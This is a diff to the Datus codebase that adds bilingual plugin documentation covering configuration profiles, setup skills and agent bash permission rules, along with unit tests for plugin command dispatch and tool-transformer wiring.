+setup 的 `SKILL.md` 按顺序覆盖:
+
+1. **何时使用**——plugin 未配置,或用户要新增环境。
+2. **配置结构**——`agent.plugins.<name>.<profile>` 的完整 YAML 模板,用注释标注
+   必填 / 可选 / 敏感字段。
+3. **询问用户**——列出必须由用户提供的字段(endpoint、认证方式等)。密钥类字段要指示
+   agent 让用户自己导出环境变量,YAML 里写 `${VAR}` 占位——绝不把明文密钥写入文件。
+4. **写入配置**——写到 prompt 的 `## Plugins` 前导块中给出的 config 文件,第一个
+   profile 标 `default: true`。
+5. **验证**——用一条低成本只读命令(如 `datus hello version`)。`datus <plugin>`
+   每次调用都会重新加载配置,新 profile 立即可用;prompt 里的环境列表下次会话刷新。
+
+加一条守护说明:若当前环境不可编辑 config 文件(API / VSCode / web 部署),
+agent 应改为告知用户在服务端手工编辑 `agent.yml`。
+
+一个完整的最小 `hello-setup/SKILL.md`:
+
+````markdown
+---
+name: hello-setup
+description: Configure an environment profile for the `datus hello` plugin
+---
+
+# Hello Setup
+
+Use this skill when `datus hello` is installed but has no configured
+environment, or when the user wants to add another one.
+
+## Config structure
+
+Profiles live under `agent.plugins.hello.<profile>` in the config file named
+by the `## Plugins` section of the system prompt:
+
+```yaml
+agent:
+  plugins:
+    hello:
+      prod:
+        default: true            # mark the first profile as default
+        greeting: Hi             # required
+        token: ${HELLO_TOKEN}    # secret — reference an env var, never a literal
+```
+
+## Steps
+
+1. Ask the user for `greeting` and which environment variable holds the
+   token. Have the user export the variable; write `${VAR}` into the YAML —
+   never a literal secret.
+2. Write the profile into the config file above; mark the first profile
+   `default: true`.
+3. Verify with a cheap read-only call: `datus hello Ada`.
+
+If this environment cannot edit the config file (API / web deployment), tell
+the user to edit `agent.yml` on the server instead.
+````
+
+## 端到端验证你的 plugin
+
+`pip install -e` 之后,每个功能面都可以直接检查,无需重启任何东西
+(plugin 在每次调用时被发现):
+
+- **CLI 分发**——在任意目录执行 `datus <name> ...`。如果它落进了 REPL 而不是你的
+  plugin,说明 entry point 缺失或名字不对;用 `pip show -f your-package` 检查
+  `entry_points.txt`。
+- **Skills**——启动 `datus` 并执行 `/skill list`;plugin 自带的 skill 会与项目、
+  用户 skill 并列出现。
+- **Prompt 注入**——最简单的检查是单测直接调用 `system_prompt()`(见下一节)。
+  要确认它进入了真实会话,启动 `datus` 后问 agent"配置了哪些 plugin?"——答案
+  就来自注入的段落。注意:配置修改对下一次 `datus <plugin>` 调用立即生效,但
+  prompt 段落要到下一个会话才刷新。
+
+## 测试你的 plugin
+
+因为 Datus 是 broker,单测只需用普通 dict 构造你的 plugin——不需要 `agent.yml`,不导入 Datus:
+
+```python
+from datus_plugin_hello.plugin import HelloPlugin
+
+def test_run_cli_uses_profile_greeting(capsys):
+    rc = HelloPlugin(profile={"name": "prod", "greeting": "Hi"}).run_cli(["Ada"])
+    assert rc == 0
+    assert "Hi, Ada!" in capsys.readouterr().out
+
+def test_system_prompt_lists_envs_without_secrets():
+    text = HelloPlugin.system_prompt({
+        "prod": {"name": "prod", "greeting": "Hi", "token": "s3cr3t"},
+    })
+    assert "## Hello" in text
+    assert "s3cr3t" not in text          # 密钥绝不能泄漏
+
+def test_system_prompt_unconfigured_points_to_setup_skill():
+    text = HelloPlugin.system_prompt({})
+    assert "not configured" in text
+    assert "hello-setup" in text
+```
+
+## 约束自检清单
+
+发布前逐项确认:
+
+- [ ] 包内任何地方都**不** `import datus`(`grep -rn "import datus" your_pkg/`)。
+- [ ] `pyproject.toml` **不**依赖 `datus` 或任何共享 plugin SDK。
+- [ ] `__init__` 以名为 `profile` 的关键字参数接收 profile(Datus 调用 `PluginClass(profile=...)`)。
+- [ ] entry-point 名不是保留字(`upgrade`、`skill`),且不以 `-` 开头。
+- [ ] `skills_dir`、`system_prompt` 与 `cli_permissions` 类级可取(`@classmethod` / `@staticmethod` / 类属性)。
+- [ ] `system_prompt` 只输出非敏感字段。
+- [ ] `cli_permissions` 的 pattern 相对命名空间书写(不要自带 `datus <name>` 前缀——Datus 会加),且改状态的子命令在 `normal` 下是 `ask`。
+- [ ] `run_cli` 返回 int(或 `None`),成功路径上不调用 `sys.exit()`。
+- [ ] skill 文件已打进 wheel。
+- [ ] `datus.plugins` 的 entry-point 名与目标 `datus <name>` 命令、`agent.plugins.<name>` 配置键一致。
+
+## 参考
+
+- **Entry-point 组**:`datus.plugins`——一个 plugin 一条,解析到一个 plugin **类**。
+- **契约权威来源**:`datus/plugins/base.py`(文档化的 `DatusPlugin` 协议)。
+- **相关**:[Plugin 介绍](introduction.zh.md)、[Skills](../skills/introduction.zh.md)。

--- a/docs/plugin/introduction.md
+++ b/docs/plugin/introduction.md
@@ -1,0 +1,145 @@
+# Plugin Introduction
+
+A **plugin** is an installable Python package that extends Datus without
+modifying it. Install one into the same Python environment as `datus` and,
+depending on what the plugin ships, you get:
+
+| Surface | What it adds |
+|---|---|
+| CLI subcommand | `datus <plugin> ...` runs the plugin's own command-line interface |
+| Skills | plugin-bundled skills appear in `/skill list`, alongside project and user skills |
+| Agent awareness | the plugin describes itself and its configured environments in the agent's system prompt, so the model chooses it proactively |
+| Bash permissions | the plugin pre-declares which of its subcommands the agent may auto-run and which need confirmation |
+| Tool transformers | the plugin can rewrite or deny the agent's tool calls before execution (e.g. enforce SQL scoping policies) |
+
+Plugins are discovered through the `datus.plugins` Python entry-point group on
+every invocation — installing or upgrading a plugin requires no restart and no
+registration step.
+
+Want to build one? See the [development guide](development.md).
+
+## Installing a plugin
+
+Install the plugin package into the same environment as `datus`:
+
+```bash
+pip install datus-plugin-hello
+datus hello Ada          # the subcommand is available immediately
+```
+
+If `datus <name>` falls through to the REPL instead of running the plugin, the
+package is not installed in the environment `datus` runs from.
+
+## Configuration
+
+Plugins are configured under `agent.plugins.<name>` in `agent.yml`, where each
+key below `<name>` is a **profile** — one named environment (endpoint,
+credentials, options). A plugin can have any number of profiles:
+
+```yaml
+agent:
+  plugins:
+    hello:
+      prod:
+        default: true              # picked when --profile is omitted (see below)
+        greeting: Hi
+        token: ${HELLO_TOKEN}      # prefer ${ENV_VAR} for secrets
+      staging:
+        greeting: Yo
+```
+
+Datus resolves the config file in this order: explicit `--config` →
+`./conf/agent.yml` (project) → `~/.datus/conf/agent.yml` (user default). Put
+the profile in whichever file your datus session actually loads.
+
+`${VAR}` references are expanded from environment variables per profile —
+always use them for secrets instead of literal values. Config edits take
+effect on the next `datus <plugin>` invocation; no restart is needed.
+
+Some plugins ship a `<name>-setup` skill that writes this configuration for
+you — see [Using a plugin with the agent](#using-a-plugin-with-the-agent).
+
+### Which profile runs
+
+When you run `datus <name> ...`, the active profile is resolved in this order:
+
+1. Explicit `--profile <p>` on the command line
+   (`datus hello --profile staging ...`).
+2. Project pin in `./.datus/config.yml` (see below).
+3. The profile flagged `default: true` (more than one is an error).
+4. The sole profile, if only one is configured.
+5. No `agent.plugins.<name>` section at all → the plugin runs with an empty
+   configuration (config-free plugins still work).
+6. Multiple profiles with no way to disambiguate → Datus errors and asks you
+   to pass `--profile`.
+
+### Pinning a profile per project
+
+To make one project always use a specific profile without typing `--profile`,
+pin it in the project's `./.datus/config.yml`:
+
+```yaml
+plugins:
+  hello: staging
+```
+
+## Using a plugin with the agent
+
+Beyond running `datus <name> ...` yourself, plugins integrate with the agent:
+
+- **Skills** — plugin-bundled skills show up in `/skill list` and can be
+  invoked like any other skill.
+- **Prompt awareness** — a configured plugin lists its environments in the
+  agent's system prompt, so the model knows the plugin exists and picks it
+  proactively. Ask the agent "which plugins are configured?" to see what it
+  knows. The prompt section refreshes at session start; config edits made
+  mid-session appear in the next session.
+- **Guided setup** — an installed-but-unconfigured plugin typically announces
+  itself in the prompt and points the agent at its bundled `<name>-setup`
+  skill. Ask the agent to set the plugin up, and it collects the required
+  values and writes the profile for you (secrets are referenced as `${VAR}`,
+  never written literally).
+
+## Agent bash permissions
+
+When the **agent** (not you) runs a plugin's CLI through its bash tool, the
+command goes through Datus' permission layer. Plugins can pre-declare, per
+permission profile (`normal` / `auto`), which of their subcommands are safe to
+auto-run (`allow`), which require confirmation (`ask`), and which are blocked
+(`deny`). Without a declaration, every agent-issued plugin command prompts for
+confirmation.
+
+What this means in practice:
+
+- **Plugin declarations are namespace-scoped.** A plugin can only shape rules
+  for `datus <its-own-name> ...` — never for `rm`, other plugins, or anything
+  else.
+- **Your rules always win.** A `deny` rule you write under
+  `permissions.bash_commands` in `agent.yml` overrides any plugin `allow`
+  (precedence is deny > ask > allow), and plugin declarations never change a
+  profile's default posture.
+- **`ask` can be relaxed per project.** When the agent hits a plugin-declared
+  `ask` subcommand, the confirmation prompt offers **allow (project)** —
+  choosing it persists the exact matched pattern to the project's
+  `.datus/config.yml` `bash_allow` list, and that subcommand auto-runs from
+  then on. The grant never widens beyond the exact pattern, and plugin `deny`
+  rules are unaffected.
+- **Only the agent is gated.** Typing `datus <name> ...` in a terminal
+  yourself is never affected.
+- The `dangerous` permission profile ignores all command-level bash rules by
+  design, including plugin declarations.
+
+## Disabling the plugin system
+
+`agent.plugins_enabled: false` in `agent.yml` is a master switch that turns
+off **all** plugin functionality — `datus <plugin>` dispatch, plugin-bundled
+skills, prompt injection (including setup guidance), permission declarations,
+and tool transformers. Recommended for API/web deployments where the agent
+must not be guided to edit configuration files. The default is `true`.
+
+## Next steps
+
+- [Plugin Development](development.md) — build your own plugin, from a minimal
+  `hello` command to the full contract.
+- [Skills](../skills/introduction.md) — how skills work, including
+  plugin-bundled ones.

--- a/docs/plugin/introduction.zh.md
+++ b/docs/plugin/introduction.zh.md
@@ -1,0 +1,123 @@
+# Plugin 介绍
+
+**plugin**(插件)是一个可安装的 Python 包,在不修改 Datus 本身的前提下对其进行扩展。
+把插件安装到与 `datus` 相同的 Python 环境中,根据插件打包的内容,你可以获得:
+
+| 功能面 | 提供什么 |
+|---|---|
+| CLI 子命令 | `datus <plugin> ...` 运行插件自己的命令行界面 |
+| Skills | 插件自带的 skill 出现在 `/skill list` 中,与项目、用户 skill 并列 |
+| Agent 感知 | 插件在 agent 的 system prompt 中描述自己和已配置的环境,模型会主动选用它 |
+| Bash 权限 | 插件预先声明哪些子命令 agent 可以直接执行、哪些需要确认 |
+| 工具 transformer | 插件可以在 agent 的工具调用执行前改写参数或拒绝调用(如强制 SQL 作用域策略) |
+
+Datus 通过 `datus.plugins` Python entry-point 组在每次调用时发现插件——安装或升级插件
+无需重启,也没有任何注册步骤。
+
+想开发自己的插件?见[开发指南](development.zh.md)。
+
+## 安装插件
+
+把插件包安装到与 `datus` 相同的环境:
+
+```bash
+pip install datus-plugin-hello
+datus hello Ada          # 子命令立即可用
+```
+
+如果 `datus <name>` 落进了 REPL 而不是运行插件,说明该包没有安装在 `datus`
+所运行的环境里。
+
+## 配置
+
+插件在 `agent.yml` 的 `agent.plugins.<name>` 下配置,`<name>` 之下的每个键是一个
+**profile**——一套命名环境(endpoint、凭据、选项)。一个插件可以有任意多个 profile:
+
+```yaml
+agent:
+  plugins:
+    hello:
+      prod:
+        default: true              # 省略 --profile 时选它(见下)
+        greeting: Hi
+        token: ${HELLO_TOKEN}      # 密钥优先用 ${ENV_VAR}
+      staging:
+        greeting: Yo
+```
+
+Datus 按以下顺序解析 config 文件:显式 `--config` → `./conf/agent.yml`(项目级)→
+`~/.datus/conf/agent.yml`(用户默认)。把 profile 写进你的 datus 会话实际加载的那个文件。
+
+`${VAR}` 引用会按 profile 从环境变量展开——密钥请一律使用它,不要写明文。配置修改对
+下一次 `datus <plugin>` 调用即刻生效,无需重启。
+
+有些插件自带 `<name>-setup` skill,可以替你写好这段配置——见
+[与 agent 配合使用](#agent)。
+
+### 哪个 profile 生效 {#which-profile-runs}
+
+执行 `datus <name> ...` 时,激活 profile 按以下顺序解析:
+
+1. 命令行显式 `--profile <p>`(`datus hello --profile staging ...`)。
+2. 项目 pin —— `./.datus/config.yml`(见下)。
+3. 标了 `default: true` 的 profile(超过一个 → 报错)。
+4. 唯一 profile(只配了一个时直接用)。
+5. 完全没有 `agent.plugins.<name>` 配置段 → 插件以空配置运行(config-free
+   插件仍可工作)。
+6. 多个 profile 且无法判定 → Datus 报错,提示传 `--profile`。
+
+### 按项目固定 profile
+
+想让某个项目始终使用特定 profile 而不必每次敲 `--profile`,在项目的
+`./.datus/config.yml` 里 pin 住它:
+
+```yaml
+plugins:
+  hello: staging
+```
+
+## 与 agent 配合使用 {#agent}
+
+除了自己在终端执行 `datus <name> ...`,插件还与 agent 深度集成:
+
+- **Skills** —— 插件自带的 skill 出现在 `/skill list`,可以像其他 skill 一样调用。
+- **Prompt 感知** —— 已配置的插件会把自己的环境列表写进 agent 的 system prompt,
+  模型因此知道插件的存在并主动选用。可以问 agent"配置了哪些 plugin?"来查看它
+  掌握的信息。prompt 段落在会话启动时刷新;会话中途的配置修改要到下一个会话才可见。
+- **引导式配置** —— 已安装但未配置的插件通常会在 prompt 中声明自己,并指向自带的
+  `<name>-setup` skill。让 agent 帮你配置,它会收集必填项并替你写入 profile
+  (密钥以 `${VAR}` 形式引用,绝不写明文)。
+
+## Agent bash 权限
+
+当 **agent**(而非你本人)通过它的 bash 工具执行插件 CLI 时,命令会经过 Datus 的
+权限层。插件可以按权限 profile(`normal` / `auto`)预先声明:哪些子命令可以直接
+放行(`allow`)、哪些必须确认(`ask`)、哪些直接拦截(`deny`)。若无任何声明,
+agent 发起的每条插件命令都会弹出确认。
+
+实际含义:
+
+- **插件声明只作用于自己的命名空间。** 插件只能为 `datus <自己的名字> ...` 声明
+  规则——碰不到 `rm`、其他插件或任何别的命令。
+- **你的规则永远优先。** 你写在 `agent.yml` `permissions.bash_commands` 下的
+  `deny` 规则压过插件的任何 `allow`(判定固定为 deny > ask > allow),且插件声明
+  永远改不了 profile 的默认姿态。
+- **`ask` 可按项目放宽。** agent 命中插件声明的 `ask` 子命令时,确认框会提供
+  **allow (project)** 选项——选择后把命中的 pattern 原样持久化到项目
+  `.datus/config.yml` 的 `bash_allow` 列表,此后该子命令直接放行。授权绝不会
+  扩大到 pattern 之外,插件的 `deny` 规则也不受影响。
+- **只有 agent 受门控。** 你自己在终端敲 `datus <name> ...` 不受任何影响。
+- `dangerous` 权限 profile 设计上忽略一切命令级 bash 规则,包括插件声明。
+
+## 关闭 plugin 系统 {#disabling-the-plugin-system}
+
+`agent.yml` 中的 `agent.plugins_enabled: false` 是总开关,关闭**全部** plugin
+功能——`datus <plugin>` 分发、插件自带 skill、prompt 注入(含 setup 引导)、
+权限声明与工具 transformer 一律失效。建议在 API/web 部署中关闭,避免 agent
+被引导去修改配置文件。默认值为 `true`。
+
+## 下一步
+
+- [Plugin 开发](development.zh.md) —— 从一个最小的 `hello` 命令到完整契约,开发你
+  自己的插件。
+- [Skills](../skills/introduction.zh.md) —— skill 的工作机制,包括插件自带的 skill。

--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -44,6 +44,9 @@ nav:
         - Extract Knowledge: skills/extract_knowledge.md
         - Memory Organization: skills/memory_organization.md
         - Session Summarize: skills/session_summarize.md
+    - Plugin:
+      - Introduction: plugin/introduction.md
+      - Development: plugin/development.md
     - Chatbot: web_chatbot/introduction.md
     - IM Gateway:
       - Introduction: gateway/introduction.md
@@ -192,6 +195,8 @@ plugins:
             Session Summarize: 会话总结
             Validation: 校验
             Auto Memory: 自动记忆
+            Plugin: 插件
+            Development: 开发指南
             Develop: 开发
             Observability: 可观测性
             VSCode Extension: VSCode 插件

--- a/tests/unit_tests/agent/node/test_agentic_node.py
+++ b/tests/unit_tests/agent/node/test_agentic_node.py
@@ -1805,3 +1805,156 @@ class TestEnsurePermissionHooksProxyWiring:
 
         kwargs = ph_cls.call_args.kwargs
         assert kwargs["proxied_tool_names"] == set()
+
+
+# ---------------------------------------------------------------------------
+# _ensure_tool_transformers (plugin tool argument middleware wiring)
+# ---------------------------------------------------------------------------
+
+
+class TestEnsureToolTransformers:
+    """Drive the unbound method with a minimal fake node.
+
+    The method only touches ``_tool_transformers_applied``, ``agent_config``,
+    ``get_node_name`` and (via ``apply_tool_transformers``) the tool list
+    attributes, so a SimpleNamespace keeps the tests free of the heavyweight
+    AgenticNode constructor.
+    """
+
+    @staticmethod
+    def _make_fake_node(plugins_enabled=True, tools=None):
+        from types import SimpleNamespace
+
+        from agents import FunctionTool
+
+        from datus.tools.registry.tool_registry import ToolRegistry
+
+        async def invoke(tool_ctx, args_str):
+            return {"success": 1, "result": "ok", "error": None}
+
+        default_tool = FunctionTool(
+            name="execute_sql",
+            description="t",
+            params_json_schema={"type": "object"},
+            on_invoke_tool=invoke,
+            strict_json_schema=False,
+        )
+        return SimpleNamespace(
+            _tool_transformers_applied=False,
+            agent_config=SimpleNamespace(plugins_enabled=plugins_enabled, project_root="/proj"),
+            get_node_name=lambda: "chat",
+            tools=tools if tools is not None else [default_tool],
+            tool_registry=ToolRegistry({"execute_sql": "db_tools"}),
+            proxied_tool_names=set(),
+            db_func_tool=None,
+        )
+
+    def test_wraps_tools_when_plugin_declares_transformers(self):
+        node = self._make_fake_node()
+        original_tool = node.tools[0]
+
+        with patch(
+            "datus.plugins.registry.collect_plugin_tool_transformers",
+            return_value={"execute_sql": [lambda n, a, c: a]},
+        ):
+            AgenticNode._ensure_tool_transformers(node)
+
+        assert node._tool_transformers_applied is True
+        assert node.tools[0] is not original_tool
+        assert node.tools[0].name == "execute_sql"
+
+    def test_idempotent_across_calls(self):
+        node = self._make_fake_node()
+
+        with patch(
+            "datus.plugins.registry.collect_plugin_tool_transformers",
+            return_value={"execute_sql": [lambda n, a, c: a]},
+        ) as collect:
+            AgenticNode._ensure_tool_transformers(node)
+            wrapped_once = node.tools[0]
+            AgenticNode._ensure_tool_transformers(node)
+
+        assert collect.call_count == 1
+        assert node.tools[0] is wrapped_once
+
+    def test_noop_when_no_plugin_transformers(self):
+        node = self._make_fake_node()
+        original_tool = node.tools[0]
+
+        with patch("datus.plugins.registry.collect_plugin_tool_transformers", return_value={}):
+            AgenticNode._ensure_tool_transformers(node)
+
+        assert node._tool_transformers_applied is True
+        assert node.tools[0] is original_tool
+
+    def test_gated_by_plugins_enabled(self):
+        node = self._make_fake_node(plugins_enabled=False)
+        original_tool = node.tools[0]
+
+        with patch(
+            "datus.plugins.registry.collect_plugin_tool_transformers",
+            return_value={"execute_sql": [lambda n, a, c: a]},
+        ) as collect:
+            AgenticNode._ensure_tool_transformers(node)
+
+        collect.assert_not_called()
+        assert node.tools[0] is original_tool
+
+    def test_apply_failure_raises_fail_closed(self):
+        from datus.utils.exceptions import DatusException
+
+        node = self._make_fake_node()
+
+        with patch(
+            "datus.plugins.registry.collect_plugin_tool_transformers",
+            return_value={"execute_sql": [lambda n, a, c: a]},
+        ):
+            with patch(
+                "datus.tools.middleware.apply_tool_transformers",
+                side_effect=RuntimeError("wrap exploded"),
+            ):
+                with pytest.raises(DatusException):
+                    AgenticNode._ensure_tool_transformers(node)
+
+    def test_apply_failure_stays_unapplied_and_retries_fail_closed(self):
+        """A failed apply must NOT flip the applied flag: the next call has to
+        retry (and keep raising) instead of silently running unwrapped tools."""
+        from datus.utils.exceptions import DatusException
+
+        node = self._make_fake_node()
+
+        with patch(
+            "datus.plugins.registry.collect_plugin_tool_transformers",
+            return_value={"execute_sql": [lambda n, a, c: a]},
+        ):
+            with patch(
+                "datus.tools.middleware.apply_tool_transformers",
+                side_effect=RuntimeError("wrap exploded"),
+            ):
+                with pytest.raises(DatusException):
+                    AgenticNode._ensure_tool_transformers(node)
+                assert node._tool_transformers_applied is False
+                # Second turn on the same node: still fail closed, not fail open.
+                with pytest.raises(DatusException):
+                    AgenticNode._ensure_tool_transformers(node)
+
+            # Once the transient failure clears, wrapping applies normally.
+            AgenticNode._ensure_tool_transformers(node)
+            assert node._tool_transformers_applied is True
+
+    def test_wrapping_mutates_tool_list_in_place(self):
+        """Callers capture ``self.tools`` before hooks compose (argument
+        evaluation order); the wrap must be visible through that reference."""
+        node = self._make_fake_node()
+        captured = node.tools
+        original_tool = captured[0]
+
+        with patch(
+            "datus.plugins.registry.collect_plugin_tool_transformers",
+            return_value={"execute_sql": [lambda n, a, c: a]},
+        ):
+            AgenticNode._ensure_tool_transformers(node)
+
+        assert node.tools is captured
+        assert captured[0] is not original_tool
+        assert captured[0].name == "execute_sql"

--- a/tests/unit_tests/agent/node/test_chat_agentic_node.py
+++ b/tests/unit_tests/agent/node/test_chat_agentic_node.py
@@ -1701,6 +1701,24 @@ class TestChatAgenticNodeRebuildTools:
         tool_names = [t.name for t in node.tools]
         assert "ask_user" in tool_names
 
+    def test_rebuild_tools_resets_transformer_flag(self, real_agent_config, mock_llm_create):
+        """Rebuilding replaces wrapped FunctionTools with fresh unwrapped ones,
+        so plugin tool transformers must re-apply on the next hook composition
+        (e.g. after a mid-session task-database switch)."""
+        from datus.agent.node.chat_agentic_node import ChatAgenticNode
+
+        node = ChatAgenticNode(
+            node_id="test_rebuild_flag",
+            description="Test rebuild resets transformer flag",
+            node_type=NodeType.TYPE_CHAT,
+            agent_config=real_agent_config,
+        )
+        node._tool_transformers_applied = True
+
+        node._rebuild_tools()
+
+        assert node._tool_transformers_applied is False
+
     def test_rebuild_tools_with_no_optional_components(self, real_agent_config, mock_llm_create):
         """_rebuild_tools works when optional tool components are None."""
         from datus.agent.node.chat_agentic_node import ChatAgenticNode

--- a/tests/unit_tests/cli/test_external_command_dispatch.py
+++ b/tests/unit_tests/cli/test_external_command_dispatch.py
@@ -1,0 +1,142 @@
+# Copyright 2025-present DatusAI, Inc.
+# Licensed under the Apache License, Version 2.0.
+# See http://www.apache.org/licenses/LICENSE-2.0 for details.
+
+"""Unit tests for the ``datus.cli_commands`` entry-point dispatch in main()."""
+
+import importlib.metadata as importlib_metadata
+
+from datus.cli.main import _dispatch_external_command
+
+
+class _FakeEntryPoint:
+    def __init__(self, name, handler, *, raises=False):
+        self.name = name
+        self.group = "datus.cli_commands"
+        self._handler = handler
+        self._raises = raises
+
+    def load(self):
+        if self._raises:
+            raise ImportError("cannot import adapter cli")
+        return self._handler
+
+
+class _FakeEntryPoints:
+    def __init__(self, eps):
+        self._eps = eps
+
+    def select(self, *, group, name=None):
+        out = [ep for ep in self._eps if ep.group == group]
+        if name is not None:
+            out = [ep for ep in out if ep.name == name]
+        return out
+
+
+def _patch(monkeypatch, eps):
+    monkeypatch.setattr(importlib_metadata, "entry_points", lambda: _FakeEntryPoints(eps))
+
+
+def test_matching_command_invoked_with_remaining_argv(monkeypatch):
+    """A registered command is invoked with argv after the subcommand name and its rc returned."""
+    captured = {}
+
+    def handler(argv):
+        captured["argv"] = argv
+        return 0
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", handler)])
+    rc = _dispatch_external_command(["hello", "dags", "list", "--json"])
+    assert rc == 0
+    assert captured["argv"] == ["dags", "list", "--json"]
+
+
+def test_handler_returning_none_maps_to_zero(monkeypatch):
+    """A handler returning ``None`` is normalized to exit code 0."""
+    _patch(monkeypatch, [_FakeEntryPoint("hello", lambda argv: None)])
+    assert _dispatch_external_command(["hello", "version"]) == 0
+
+
+def test_handler_nonzero_rc_propagates(monkeypatch):
+    """A non-zero handler return code propagates unchanged."""
+    _patch(monkeypatch, [_FakeEntryPoint("hello", lambda argv: 5)])
+    assert _dispatch_external_command(["hello", "dags", "trigger", "x"]) == 5
+
+
+def test_unknown_command_returns_none(monkeypatch):
+    """No matching entry point → None (caller falls through to REPL/argparse)."""
+    _patch(monkeypatch, [_FakeEntryPoint("hello", lambda argv: 0)])
+    assert _dispatch_external_command(["definitely_unknown"]) is None
+
+
+def test_flag_only_invocation_returns_none(monkeypatch):
+    """A leading flag (datus --web / -p) is never hijacked."""
+    _patch(monkeypatch, [_FakeEntryPoint("hello", lambda argv: 0)])
+    assert _dispatch_external_command(["--web"]) is None
+    assert _dispatch_external_command(["-p", "hi"]) is None
+
+
+def test_empty_argv_returns_none(monkeypatch):
+    _patch(monkeypatch, [_FakeEntryPoint("hello", lambda argv: 0)])
+    assert _dispatch_external_command([]) is None
+
+
+def test_reserved_subcommands_return_none(monkeypatch):
+    """Reserved built-in tokens are never dispatched to adapters."""
+    _patch(monkeypatch, [_FakeEntryPoint("upgrade", lambda argv: 99), _FakeEntryPoint("skill", lambda argv: 99)])
+    assert _dispatch_external_command(["upgrade"]) is None
+    assert _dispatch_external_command(["skill", "list"]) is None
+
+
+def test_load_failure_returns_one(monkeypatch):
+    """A broken adapter entry point returns rc=1 instead of crashing."""
+    _patch(monkeypatch, [_FakeEntryPoint("hello", None, raises=True)])
+    assert _dispatch_external_command(["hello", "dags", "list"]) == 1
+
+
+def test_handler_exception_returns_one_instead_of_crashing(monkeypatch, capsys):
+    """A handler that raises must not crash the CLI with a raw traceback."""
+
+    def handler(argv):
+        raise KeyError("bad config")
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", handler)])
+    assert _dispatch_external_command(["hello", "dags", "list"]) == 1
+    assert "datus hello" in capsys.readouterr().err
+
+
+def test_handler_non_int_rc_treated_as_success(monkeypatch):
+    """Legacy handlers returning non-int values (e.g. 'ok') must not raise
+    ValueError after a successful run."""
+    _patch(monkeypatch, [_FakeEntryPoint("hello", lambda argv: "ok")])
+    assert _dispatch_external_command(["hello", "version"]) == 0
+
+
+def test_handler_bool_rc_maps_to_exit_semantics(monkeypatch):
+    """True means success (exit 0); False means failure (exit 1)."""
+    _patch(monkeypatch, [_FakeEntryPoint("hello", lambda argv: True)])
+    assert _dispatch_external_command(["hello", "version"]) == 0
+    _patch(monkeypatch, [_FakeEntryPoint("hello", lambda argv: False)])
+    assert _dispatch_external_command(["hello", "version"]) == 1
+
+
+def test_multiple_candidates_first_wins(monkeypatch):
+    """When two adapters register the same name, the first is used."""
+    _patch(
+        monkeypatch,
+        [
+            _FakeEntryPoint("hello", lambda argv: 1),
+            _FakeEntryPoint("hello", lambda argv: 2),
+        ],
+    )
+    assert _dispatch_external_command(["hello", "x"]) == 1
+
+
+def test_lookup_failure_returns_none(monkeypatch):
+    """A failure enumerating entry points falls through (None), never raises."""
+
+    def _boom():
+        raise RuntimeError("metadata broken")
+
+    monkeypatch.setattr(importlib_metadata, "entry_points", _boom)
+    assert _dispatch_external_command(["hello", "dags", "list"]) is None

--- a/tests/unit_tests/cli/test_plugin_dispatch.py
+++ b/tests/unit_tests/cli/test_plugin_dispatch.py
@@ -1,0 +1,220 @@
+# Copyright 2025-present DatusAI, Inc.
+# Licensed under the Apache License, Version 2.0.
+# See http://www.apache.org/licenses/LICENSE-2.0 for details.
+
+"""Unit tests for ``datus.plugins`` dispatch + ``--profile``/``--config`` split."""
+
+from datus.cli import main as cli_main
+from datus.cli.main import _dispatch_plugin_command, _split_plugin_globals
+
+# ── _split_plugin_globals ────────────────────────────────────────────────────
+
+
+def test_split_consumes_leading_profile_and_config():
+    profile, config, rest = _split_plugin_globals(
+        ["--profile", "staging", "--config", "a.yml", "dags", "list", "--json"]
+    )
+    assert profile == "staging"
+    assert config == "a.yml"
+    assert rest == ["dags", "list", "--json"]
+
+
+def test_split_equals_form():
+    profile, config, rest = _split_plugin_globals(["--profile=prod", "--config=x.yml", "dags", "trigger", "d"])
+    assert profile == "prod"
+    assert config == "x.yml"
+    assert rest == ["dags", "trigger", "d"]
+
+
+def test_split_stops_at_first_command_token():
+    profile, config, rest = _split_plugin_globals(["dags", "--profile", "ignored"])
+    assert profile is None and config is None
+    assert rest == ["dags", "--profile", "ignored"]
+
+
+def test_split_no_globals():
+    assert _split_plugin_globals(["dags", "list"]) == (None, None, ["dags", "list"])
+
+
+# ── _dispatch_plugin_command ─────────────────────────────────────────────────
+
+
+class _StubPlugin:
+    """Records how datus constructed and drove it."""
+
+    last = {}
+
+    def __init__(self, profile=None):
+        _StubPlugin.last["profile"] = profile
+
+    def run_cli(self, argv):
+        _StubPlugin.last["argv"] = argv
+        return 7
+
+
+class _StubConfig:
+    def __init__(self, profile):
+        self._profile = profile
+        self.requested = {}
+
+    def get_plugin_profile(self, name, profile=None):
+        self.requested["name"] = name
+        self.requested["profile"] = profile
+        return self._profile
+
+
+def _patch_dispatch(monkeypatch, *, plugin_cls, profile_dict, load_calls=None):
+    monkeypatch.setattr("datus.plugins.registry.plugin_entry_point_exists", lambda name: True)
+    monkeypatch.setattr("datus.plugins.registry.load_plugin_class", lambda name: plugin_cls)
+
+    stub_cfg = _StubConfig(profile_dict)
+
+    def fake_load_agent_config(**kwargs):
+        if load_calls is not None:
+            load_calls.append(kwargs)
+        return stub_cfg
+
+    monkeypatch.setattr("datus.configuration.agent_config_loader.load_agent_config", fake_load_agent_config)
+    return stub_cfg
+
+
+def test_dispatch_constructs_plugin_with_resolved_profile(monkeypatch):
+    _StubPlugin.last = {}
+    profile = {"name": "prod", "api_base_url": "http://h"}
+    stub_cfg = _patch_dispatch(monkeypatch, plugin_cls=_StubPlugin, profile_dict=profile)
+
+    rc = _dispatch_plugin_command(["hello", "--profile", "prod", "dags", "list"])
+
+    assert rc == 7  # run_cli's return code, coerced to int
+    assert _StubPlugin.last["profile"] == profile
+    assert _StubPlugin.last["argv"] == ["dags", "list"]  # globals stripped
+    assert stub_cfg.requested == {"name": "hello", "profile": "prod"}
+
+
+def test_dispatch_forwards_config_path(monkeypatch):
+    _StubPlugin.last = {}
+    load_calls = []
+    _patch_dispatch(monkeypatch, plugin_cls=_StubPlugin, profile_dict={}, load_calls=load_calls)
+
+    _dispatch_plugin_command(["hello", "--config", "/tmp/agent.yml", "version"])
+
+    assert load_calls == [{"config": "/tmp/agent.yml"}]
+
+
+def test_dispatch_no_config_flag_omits_config_kwarg(monkeypatch):
+    _StubPlugin.last = {}
+    load_calls = []
+    _patch_dispatch(monkeypatch, plugin_cls=_StubPlugin, profile_dict={}, load_calls=load_calls)
+
